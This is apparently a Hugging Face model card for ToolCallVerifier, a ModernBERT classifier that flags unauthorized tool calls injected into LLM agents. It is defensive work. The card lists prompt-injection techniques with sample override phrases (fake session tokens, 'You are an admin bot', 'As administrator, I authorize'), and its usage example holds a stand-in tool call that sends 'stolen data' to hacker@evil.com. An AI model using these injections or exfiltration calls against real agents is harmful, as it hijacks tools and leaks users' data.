---
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
  results:
  - task:
      type: token-classification
      name: Unauthorized Tool Call Detection
    metrics:
    - name: UNAUTHORIZED F1
      type: f1
      value: 0.9350
    - name: UNAUTHORIZED Precision
      type: precision
      value: 0.9501
    - name: UNAUTHORIZED Recall
      type: recall
      value: 0.9205
    - name: Accuracy
      type: accuracy
      value: 0.9288
---
# ToolCallVerifier - Unauthorized Tool Call Detection
<div align="center">
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)
**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
</div>
---
## 🎯 What This Model Does
ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
| Label | Description |
|-------|-------------|
| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
| `UNAUTHORIZED` | Token indicates injected/malicious content: **BLOCK** |
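
As a minimal sketch of how these token labels might be turned into a call-level decision, the helper below blocks a tool call as soon as any token is labeled `UNAUTHORIZED`. The `[USER] ... [TOOL] ...` input layout follows the usage example in this card; the function names `build_input` and `should_block` are illustrative assumptions and not part of the model's API.

```python
import json


def build_input(user_intent: str, tool_name: str, arguments: dict) -> str:
    """Format a user request and a tool call as '[USER] ... [TOOL] ...'."""
    tool_call = json.dumps({"name": tool_name, "arguments": arguments})
    return f"[USER] {user_intent} [TOOL] {tool_call}"


def should_block(token_labels: list[str]) -> bool:
    """Block the call if any token carries the UNAUTHORIZED label."""
    return any(label == "UNAUTHORIZED" for label in token_labels)


# Hypothetical example values, for illustration only.
text = build_input("Summarize my emails", "send_email", {"to": "hacker@evil.com"})
print(text)
print(should_block(["AUTHORIZED", "UNAUTHORIZED", "AUTHORIZED"]))
```

An "any token" rule is the strictest choice; a deployment could instead require a minimum number of flagged tokens, at the cost of letting short injections through.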
---
## 📊 Performance
| Metric | Value |
|--------|-------|
| **UNAUTHORIZED F1** | **93.50%** |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |
### Confusion Matrix (Token-Level)
```
                  Predicted
                  AUTH       UNAUTH
Actual  AUTH      130,708    8,483
        UNAUTH    13,924     161,031
```
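
The headline metrics can be recomputed from the token counts in the confusion matrix, treating `UNAUTHORIZED` as the positive class. The snippet below is a worked check, not the original evaluation script.

```python
# Token counts copied from the confusion matrix above.
tn, fp = 130_708, 8_483     # actual AUTHORIZED: predicted AUTH / UNAUTH
fn, tp = 13_924, 161_031    # actual UNAUTHORIZED: predicted AUTH / UNAUTH

precision = tp / (tp + fp)
recall = tp / (tp + fn)
f1 = 2 * precision * recall / (precision + recall)
accuracy = (tp + tn) / (tp + tn + fp + fn)

for name, value in [
    ("precision", precision),
    ("recall", recall),
    ("f1", f1),
    ("accuracy", accuracy),
]:
    print(f"{name}: {value:.2%}")
```

The recomputed values should land within about 0.02 percentage points of the table; this card does not state the source of the small residual difference.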
---
## 🗂️ Training Data
Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
### HuggingFace Datasets
| Dataset | Description | Samples |
|---------|-------------|---------|
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
### Synthetic Attack Generators
| Generator | Description |
|-----------|-------------|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
---
## 🚨 Attack Categories Covered
| Category | Source | Description |
|----------|--------|-------------|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |
---
## 💻 Usage
```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'

# Combine the user intent and the tool call into a single input string
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

# Run inference without tracking gradients
with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

# Map the predicted class ids back to label names, one per token
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("✅ Tool call authorized")
```
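
Flagged subword tokens are hard to read on their own, so it can help to map them back to character spans in the input. The sketch below assumes the offsets come from a fast tokenizer called with `return_offsets_mapping=True` (the `offset_mapping` entry would need to be removed from `inputs` before calling the model). The helper name `flagged_spans` and the hand-written offsets are illustrative assumptions, not output from this model.

```python
def flagged_spans(offsets, labels, text):
    """Merge runs of consecutive UNAUTHORIZED tokens into (start, end, substring)."""
    spans = []
    prev_flagged = False
    for (start, end), label in zip(offsets, labels):
        if start == end:
            # Special tokens have empty offsets; skip them.
            continue
        flagged = label == "UNAUTHORIZED"
        if flagged and prev_flagged:
            spans[-1][1] = end          # extend the current run
        elif flagged:
            spans.append([start, end])  # start a new run
        prev_flagged = flagged
    return [(s, e, text[s:e]) for s, e in spans]


# Hand-written offsets and labels standing in for tokenizer and model output.
text = '[TOOL] {"to": "hacker@evil.com"}'
a = text.index("hacker")
offsets = [(0, 0), (0, a), (a, a + 6), (a + 6, a + 7), (a + 7, a + 15),
           (a + 15, len(text)), (0, 0)]
labels = ["AUTHORIZED", "AUTHORIZED", "UNAUTHORIZED", "UNAUTHORIZED",
          "UNAUTHORIZED", "AUTHORIZED", "AUTHORIZED"]
print(flagged_spans(offsets, labels, text))
```

Reporting spans rather than raw tokens makes it easier to log which argument value triggered the block.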
---
## ⚙️ Training Configuration
| Parameter | Value |
|-----------|-------|
| Base Model | `answerdotai/ModernBERT-base` |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
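
To illustrate what the class weights do, here is a pure-Python sketch of a class-weighted cross-entropy. It assumes the weights are applied the way `torch.nn.CrossEntropyLoss(weight=...)` applies them with its default mean reduction (a weighted sum divided by the summed weights of the targets); the actual training script is not shown in this card, and the logits below are made up for illustration.

```python
import math

CLASS_WEIGHTS = [0.5, 3.0]  # (AUTHORIZED, UNAUTHORIZED), from the table above


def weighted_cross_entropy(logits, targets, weights=CLASS_WEIGHTS):
    """Weighted mean of per-token negative log-likelihoods."""
    total, weight_sum = 0.0, 0.0
    for token_logits, target in zip(logits, targets):
        # Numerically stable log-sum-exp for one token.
        m = max(token_logits)
        log_z = m + math.log(sum(math.exp(z - m) for z in token_logits))
        nll = log_z - token_logits[target]
        total += weights[target] * nll
        weight_sum += weights[target]
    return total / weight_sum


# Two tokens, both predicted AUTHORIZED; the second is actually UNAUTHORIZED.
logits = [[2.0, 0.0], [2.0, 0.0]]
targets = [0, 1]
weighted = weighted_cross_entropy(logits, targets)
unweighted = weighted_cross_entropy(logits, targets, weights=[1.0, 1.0])
print(f"weighted={weighted:.4f} unweighted={unweighted:.4f}")
```

With these weights a missed `UNAUTHORIZED` token contributes six times as much to the loss as a misclassified `AUTHORIZED` token, which pushes training toward higher recall on the attack class.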
---
## 🔗 Integration with FunctionCallSentinel
This model is **Stage 2** of a two-stage defense pipeline:
```
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼──────────────────────────┐
                               │              ToolCallVerifier (This Model)              │
                               │     Token-level verification before tool execution      │
                               └─────────────────────────────────────────────────────────┘
```
| Scenario | Recommendation |
|----------|----------------|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | **Both stages** |
| Email/file system access | **Both stages** |
| Financial transactions | **Both stages** |
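
The control flow of the two-stage pipeline can be sketched as below. All five callables are hypothetical placeholders for the Stage 1 classifier, the LLM, this model, and the tool executor; none of them is an API provided by either model, and the stub lambdas exist only to make the example runnable.

```python
from typing import Callable


def guarded_tool_call(
    user_prompt: str,
    stage1_is_safe: Callable[[str], bool],
    propose_tool_call: Callable[[str], str],
    stage2_is_authorized: Callable[[str, str], bool],
    execute: Callable[[str], str],
    use_stage2: bool = True,
) -> str:
    """Screen the prompt (Stage 1), then verify the tool call (Stage 2)."""
    if not stage1_is_safe(user_prompt):
        return "blocked: stage 1"
    tool_call = propose_tool_call(user_prompt)
    # Stage 2 runs after the LLM proposes a call and before it is executed.
    if use_stage2 and not stage2_is_authorized(user_prompt, tool_call):
        return "blocked: stage 2"
    return execute(tool_call)


# Stub components standing in for real models and tools.
result = guarded_tool_call(
    "Summarize my emails",
    stage1_is_safe=lambda prompt: True,
    propose_tool_call=lambda prompt: '{"name": "send_email"}',
    stage2_is_authorized=lambda prompt, call: "send_email" not in call,
    execute=lambda call: "executed",
)
print(result)
```

Setting `use_stage2=False` corresponds to the "Stage 1 only" rows in the table above.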
---
## 🎯 Intended Use
### Primary Use Cases
- **LLM Agent Security**: Verify tool calls before execution
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts
- **API Gateway Protection**: Filter malicious tool calls at infrastructure level
### Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English
---
## ⚠️ Limitations
1. **Tool schema dependent**: Best performance when the tool schema is included in the input
2. **English only**: Not tested on other languages
3. **Binary classification**: No "suspicious" intermediate category (by design, for decisiveness)
---
## 📜 License
Apache 2.0
---
## 🔗 Links
- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)